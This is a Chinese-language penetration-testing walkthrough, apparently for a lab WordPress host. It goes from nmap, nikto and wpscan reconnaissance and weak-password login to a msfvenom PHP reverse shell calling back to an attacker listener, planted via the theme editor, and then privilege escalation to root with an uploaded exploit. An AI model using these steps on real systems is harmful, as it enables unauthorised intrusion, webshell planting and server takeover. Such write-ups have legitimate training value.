1. 信息探测
#扫描主机服务信息以及服务版本
nmap -sV 192.168.2.117
#快速扫描主机全部信息
nmap -T4 -A -v 192.168.2.117
#探测敏感信息
nikto -host http://192.168.2.117
dirb http://192.168.2.117
2.深入挖掘
分析nmap、nikto扫描结果
浏览器访问敏感页面
查看是否有CMS,是否具有可以直接利用的漏洞
#枚举wordpress主题、插件、用户名
wpscan --url http://192.168.2.117/wordpress/ --enumerate at --enumerate ap --enumerate u
尝试弱口令登录admin/admin,登录成功
如果没有弱口令,则考虑利用弱点:
- 登录界面是否存在SQL注入
- 敏感信息是否泄漏
- 已知漏洞
- backup.zip文件
- 是否存在弱口令
3.生成webshell
#启动metasploit监听
> use exploit/multi/handler
> set payload linux/x86/meterpreter/reverse_tcp
> set lhost 192.168.2.119
> set lport 4444
> run
#生成shell
msfvenom -p php/meterpreter/reverse_tcp lhost-192.168.2.119 lport=4444 -f raw > /home/kali/Desktop/shell.php
4.上传webshell获取控制权
上传到wordpress后台theme/editor下
执行shell,获取反弹shell
http://192.168.2.117/wordpress/wp-content/themes/twentyfourteen/404.php
查看系统信息
sysinfo
查看用户权限
id
5.寻找系统EXP root服务器
登录服务器后,反弹shell的用户是www-data或其他低权限用户。
使用sudo -l 查看用户权限
使用searchsploit查找本地溢出的EXP、在meterpreter中使用upload /home/kali/Desktop/exp
上传EXP,执行,提升权限
编译该代码
上传shellroot
upload /home/kali/Desktop/shellroot
shell
chmod 777 shellroot
./shellroot
#返回root权限
whoami